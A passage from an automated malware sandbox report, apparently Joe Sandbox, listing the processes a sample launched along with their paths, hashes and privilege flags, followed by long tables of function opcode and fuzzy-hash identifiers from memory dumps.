                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:54
                                                                                                            Start time:18:42:21
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:55
                                                                                                            Start time:18:42:45
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                                            Imagebase:0x60000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:7.9%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:4
                                                                                                              Total number of Limit Nodes:0
                                                                                                              execution_graph 7971 7ffd9bbef8d8 7973 7ffd9bbef8cc 7971->7973 7972 7ffd9bbefa26 QueryFullProcessImageNameA 7974 7ffd9bbefa84 7972->7974 7973->7971 7973->7972

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9BBEF8D8 Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1869466612.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9bbe0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FullImageNameProcessQuery
                                                                                                              • String ID:
                                                                                                              • API String ID: 3578328331-0
                                                                                                              • Opcode ID: a40cfa4d701c6a932f0a8b42e8a64de656b25f1c5cb3d597e6638a5887073dda
                                                                                                              • Instruction ID: 7d0b9c61b0b85dc937d186b2c28942100faccc32db40eea980eef726c013246e
                                                                                                              • Opcode Fuzzy Hash: a40cfa4d701c6a932f0a8b42e8a64de656b25f1c5cb3d597e6638a5887073dda
                                                                                                              • Instruction Fuzzy Hash: B5719530608A8D4FEB68DF58D8557F937E1FB59315F00423EE84EC72A1CA749945CB82
                                                                                                              Function 00007FFD9B7E0D78 Relevance: .2, Instructions: 188COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61b1090d43fed3317e8594a9350836cb096fd60741477efe73e1125edb614289
                                                                                                              • Instruction ID: 4a05ef023d843d7a00f244baca50c98c693c9320c561a908a253d34976ed5062
                                                                                                              • Opcode Fuzzy Hash: 61b1090d43fed3317e8594a9350836cb096fd60741477efe73e1125edb614289
                                                                                                              • Instruction Fuzzy Hash: 0D51F671B19A8D4FD799EF688875BA8BBE1FFA5700F5101BAD058C73E6CE7818018780
                                                                                                              Function 00007FFD9B7E08D0 Relevance: .2, Instructions: 160COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 43fce7960257936479fb2833162a0c14f19baa53eefe1b97cda385da6e38db9a
                                                                                                              • Instruction ID: ade99f7b8e049fda9def40aed7c7a676ee03b9a85df2e5430b74c8164400ad5b
                                                                                                              • Opcode Fuzzy Hash: 43fce7960257936479fb2833162a0c14f19baa53eefe1b97cda385da6e38db9a
                                                                                                              • Instruction Fuzzy Hash: 07415612F0CAA90EE318F6B860AA6FDB7D1DF89329B1545FBD04EC71F7CD0868418280
                                                                                                              Function 00007FFD9B7E0960 Relevance: .1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fdbfbd65e2a7a1b6a3c896732a2a3714cb47cea0e7f12a5fc5371ab07eb3d296
                                                                                                              • Instruction ID: d55fb7fdd370a46c174a365ae055d91078b4c27d3ba399af7802076f2112a2b6
                                                                                                              • Opcode Fuzzy Hash: fdbfbd65e2a7a1b6a3c896732a2a3714cb47cea0e7f12a5fc5371ab07eb3d296
                                                                                                              • Instruction Fuzzy Hash: 83312822F1CA5D0FE358F66C646AAB873C2DF88329B1545FAE40EC32F7CD18AC414284
                                                                                                              Function 00007FFD9B7E0998 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1169f637882b4b75ba287b1405451753b3542bd56f1eae9b3b1aef322801d59a
                                                                                                              • Instruction ID: 74b4dc0d2919d068da94b4bf54f692214b37cfe194413269ee6551896e81b126
                                                                                                              • Opcode Fuzzy Hash: 1169f637882b4b75ba287b1405451753b3542bd56f1eae9b3b1aef322801d59a
                                                                                                              • Instruction Fuzzy Hash: 2D21F920B29E5D0FE798F66C946A779B3C2EF99315B5101B9E80EC32F6DD18AD418281
                                                                                                              Function 00007FFD9B7E11A1 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7bb253b544996ab9998cf0409db10d1bd5c1e622dee68b72ffb353e2c4c01a24
                                                                                                              • Instruction ID: 93c47d8510a46b6fccf4da36a0a86be6ca2f095440e949944101a00e014b2b10
                                                                                                              • Opcode Fuzzy Hash: 7bb253b544996ab9998cf0409db10d1bd5c1e622dee68b72ffb353e2c4c01a24
                                                                                                              • Instruction Fuzzy Hash: 68314130A0D64E8FDB59EB64C8659A97BF1EF56300B0545BAD009D72B2DA38A940C751
                                                                                                              Function 00007FFD9B7E0C25 Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 25f007c1076655979b4ea188fa1fb5b6bcda6bb3a7e8b6b7ed6e38361a54807b
                                                                                                              • Instruction ID: 218f13d917c41c26bc4e9a7142132fdb966d259e2f3c0769315685cca442a840
                                                                                                              • Opcode Fuzzy Hash: 25f007c1076655979b4ea188fa1fb5b6bcda6bb3a7e8b6b7ed6e38361a54807b
                                                                                                              • Instruction Fuzzy Hash: CA21B431A0D78D8FE721DBA8C8662DC7BB0EF42314F1646B7D0448B1F2D9382649CB51
                                                                                                              Function 00007FFD9B7E0F90 Relevance: .1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7834f599f75801e23d7f69187ef66a0a98407cf1cd7bd36354b00dccc6904913
                                                                                                              • Instruction ID: 21bfbbbeb07941d0d64601331a5e6a601d3897f01896b794b0f98ad158d19c43
                                                                                                              • Opcode Fuzzy Hash: 7834f599f75801e23d7f69187ef66a0a98407cf1cd7bd36354b00dccc6904913
                                                                                                              • Instruction Fuzzy Hash: 8C218E78918AA98EE348DF18C4697A57FE0FB55319F00007FC069D37D5C7B91165C780
                                                                                                              Function 00007FFD9B7E2D1E Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a6922e84096443d27bd2dd66a3e0869015020bda7e372c633f4a85d441cedc6
                                                                                                              • Instruction ID: 1ec36b26d89ac275ef26c6c454b2d8ade72d4e39b293340a98f0366c8d57bb29
                                                                                                              • Opcode Fuzzy Hash: 8a6922e84096443d27bd2dd66a3e0869015020bda7e372c633f4a85d441cedc6
                                                                                                              • Instruction Fuzzy Hash: A3211230A19A0D8FDBA4DB44C8A1BB973A1FF94304F5542A9D00ED72B1CE39AF85CB41
                                                                                                              Function 00007FFD9B7E1330 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07435a59b6db558c25f55a46f1885c53bffe0cb7ac867ea66af376fd7077fae8
                                                                                                              • Instruction ID: 54e2d48fc58adf7fa0cfeb366f545fcd67fe2dd37fa18524903579d3b1973547
                                                                                                              • Opcode Fuzzy Hash: 07435a59b6db558c25f55a46f1885c53bffe0cb7ac867ea66af376fd7077fae8
                                                                                                              • Instruction Fuzzy Hash: DD119E32F0DA5A0BE7A4E66888297B971D2EFC8350F4503B9E40DC32F6ED287A404281
                                                                                                              Function 00007FFD9B7E18EC Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a5b5987c751e1250b6c6834f3186cf0bb9a5fb9566fd53efbd67c341c5d28357
                                                                                                              • Instruction ID: 25ebbd008791bb36e669af6b3845632b1ed33a714447e885ea13b986974edc25
                                                                                                              • Opcode Fuzzy Hash: a5b5987c751e1250b6c6834f3186cf0bb9a5fb9566fd53efbd67c341c5d28357
                                                                                                              • Instruction Fuzzy Hash: F2111E31F0EB5E4AFBB4E7988866BB87291AF44710F5702B6D41DD36F2DD286E804641
                                                                                                              Function 00007FFD9B7E0C38 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a99b9b467763cd1490fcc258269645f29eed202e1eb2df8673a3c4c40eead7e
                                                                                                              • Instruction ID: c2a6bf3126bc0a2b3278b7f7380232d4427c6a59a0c8b7c31dfce5a6e3fb920f
                                                                                                              • Opcode Fuzzy Hash: 2a99b9b467763cd1490fcc258269645f29eed202e1eb2df8673a3c4c40eead7e
                                                                                                              • Instruction Fuzzy Hash: 5D11AC31A0D78D8FE702EBA898652D97BB0AF42214F0646B7C084DB2F2D53826498790
                                                                                                              Function 00007FFD9B7E0C48 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5429b08621baa0f981f2692b84ad514aad6b6200f07fb1f1ea5724211c42616c
                                                                                                              • Instruction ID: 78edf9a3a37b96830f495d1c97c8d94051cac376bb626bb425d2872484f23846
                                                                                                              • Opcode Fuzzy Hash: 5429b08621baa0f981f2692b84ad514aad6b6200f07fb1f1ea5724211c42616c
                                                                                                              • Instruction Fuzzy Hash: F7019E31A0D3888FD702DBA4D8546D97FB0AF42214F1646E7C044DB2B2D5346648C751
                                                                                                              Function 00007FFD9B7E19F9 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction ID: df8853f8ead5a5eaf70c7449aa3033da58bdb02c27a886edb123bdbd68427a1c
                                                                                                              • Opcode Fuzzy Hash: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction Fuzzy Hash: 83F0E131B49A5F8BEB74EA54C865BF87261EF54310F1702B5C40DD35B1DE386E818B40
                                                                                                              Function 00007FFD9B7E0C50 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6aa21694ba470f1aeb6bedcf5706241dbc561a53f8d765239a09f90196de1287
                                                                                                              • Instruction ID: 69df6e8bced9d42e54f308614123e1f851abddcd3edcd3225d94e54de39e149e
                                                                                                              • Opcode Fuzzy Hash: 6aa21694ba470f1aeb6bedcf5706241dbc561a53f8d765239a09f90196de1287
                                                                                                              • Instruction Fuzzy Hash: 1D01AD30A0E3898FD702EBB488546DDBFB0AF02304F1546E7C444DB2B7D9386648C751
                                                                                                              Function 00007FFD9B7E43C6 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction ID: 292cf4cb391678e2c23141bf32a4e744cd2eac708a3a5159dbcfbef2a51f1684
                                                                                                              • Opcode Fuzzy Hash: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction Fuzzy Hash: 5FE01220E0A51E47FBB49648CC61BA97264EF58300F5542B8D50FA33F1CD3CAF858745
                                                                                                              Function 00007FFD9B7E0B95 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction ID: 5a3451f0055099e6847d7e9f5e2126afa4989fba45ca6f6ac9753dc89bb3e125
                                                                                                              • Opcode Fuzzy Hash: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction Fuzzy Hash: D8D0A930229A4E8FCA00B778C88A824BBA0FF4F210BCA10E1E008C75B6C61888998700
                                                                                                              Function 00007FFD9B7E06AD Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35344ad63070a0bf8acf00768f318a100ed229d9a5dadf3759479fa3e5c46b14
                                                                                                              • Instruction ID: 4e9587b2d5d76fc2f743e0b33827957a5e2df4d38721852f5c00410fd686add4
                                                                                                              • Opcode Fuzzy Hash: 35344ad63070a0bf8acf00768f318a100ed229d9a5dadf3759479fa3e5c46b14
                                                                                                              • Instruction Fuzzy Hash: D0C04C05F5B75F01E47531EE64A71ADB5409FC4B24FD71373D50D801B19D4E27D60156
                                                                                                              Function 00007FFD9B7E34ED Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a898f1ec29ab322524b6c2f16bbd85261b4a2ce88c15834e8dd21087168eb0b
                                                                                                              • Instruction ID: 29ce923da3dcfe5923968d0e363960128252d1049ee7843ddebe7bcb41d51049
                                                                                                              • Opcode Fuzzy Hash: 7a898f1ec29ab322524b6c2f16bbd85261b4a2ce88c15834e8dd21087168eb0b
                                                                                                              • Instruction Fuzzy Hash: 4DD0A700F0DE4D05F317D300243077D64426F40214F8605F0D02D565F9CE4C270213A2
                                                                                                              Function 00007FFD9B7E0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction ID: 21eeb9be7ff4408785865dea3e4d41b72d70055cbfc7f1cba6a80ec54bc2881d
                                                                                                              • Opcode Fuzzy Hash: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction Fuzzy Hash: 80C08C305118088FC900E72CC88480432A0FF0E310BC20190E00DC7170E21A9CC1C701
                                                                                                              Function 00007FFD9B7E34C7 Relevance: .0, Instructions: 10COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e9826b78c16b7ecaff0999ccf528e7edc0bbceb9a1685a3d6f6171839d7fdd4
                                                                                                              • Instruction ID: 7a0847c45a8931a3819936f37a01c0e8a09f4416a93b8d5d6ec98e566ec72494
                                                                                                              • Opcode Fuzzy Hash: 9e9826b78c16b7ecaff0999ccf528e7edc0bbceb9a1685a3d6f6171839d7fdd4
                                                                                                              • Instruction Fuzzy Hash: 73C08C00F18C9E02F319A204243177F40825F84608FD108F0E02E86BEECD0C6A0222C3
                                                                                                              Function 00007FFD9B7E06D0 Relevance: .0, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction ID: 7e386e54c7ca1f5ea611fb68d8102c0a68c9a1a3432de03492a39d6d96f1dc3d
                                                                                                              • Opcode Fuzzy Hash: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction Fuzzy Hash: 72B01200D5760F00E42431FA18E306474409F44100FC20270D40C801B1984D16940252

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD9BBEDB1D Relevance: .6, Instructions: 602COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1869466612.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9bbe0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88e210df5cc4c3eb0b1bf7867ccdee0127597d8dc32cbfbad4fc657d775617be
                                                                                                              • Instruction ID: 753b35ff35490e10aed72b6e618663a1e27bc6a582983b41ef45a08ebd2b2b56
                                                                                                              • Opcode Fuzzy Hash: 88e210df5cc4c3eb0b1bf7867ccdee0127597d8dc32cbfbad4fc657d775617be
                                                                                                              • Instruction Fuzzy Hash: 23128431F1995E4BEBA8FBA884B56B877D1FF98308F050179D40DC72E7DE2869418782
                                                                                                              Function 00007FFD9BBEB84C Relevance: .1, Instructions: 142COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1869466612.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9bbe0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1358d2cf538c61137491f5283bd7d1aa1364f8670b0f6c84e2fa2762198a435
                                                                                                              • Instruction ID: b8389f9f1e0e2be8044fdfc2952c619b1faa022f0e9c77c3225af7789bca6406
                                                                                                              • Opcode Fuzzy Hash: c1358d2cf538c61137491f5283bd7d1aa1364f8670b0f6c84e2fa2762198a435
                                                                                                              • Instruction Fuzzy Hash: FC515A30A1950D8FEB64EFA4C4A5AAD73B2FF48318F510179D00AD72E5CF39A941CB81

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B7D0D78 Relevance: .3, Instructions: 265COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 25de3e68ff6d02ffd1405aad5810a49d3d55cc5bb66181c82c4d4e87300a91a4
                                                                                                              • Instruction ID: 9f5290afb62f884bf008680f3d1df2706dc5a2ef11ed2502b72ab083918d7e2c
                                                                                                              • Opcode Fuzzy Hash: 25de3e68ff6d02ffd1405aad5810a49d3d55cc5bb66181c82c4d4e87300a91a4
                                                                                                              • Instruction Fuzzy Hash: CF91F076A19A898FE75ADF6888797A97FE0EFA5310F0401BED049C73E2CA781845C740
                                                                                                              Function 00007FFD9B7D08D0 Relevance: .2, Instructions: 160COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0613a7e3c078aa6166850929b98cd69ef85dad92d03adef61d45f6422dc8c471
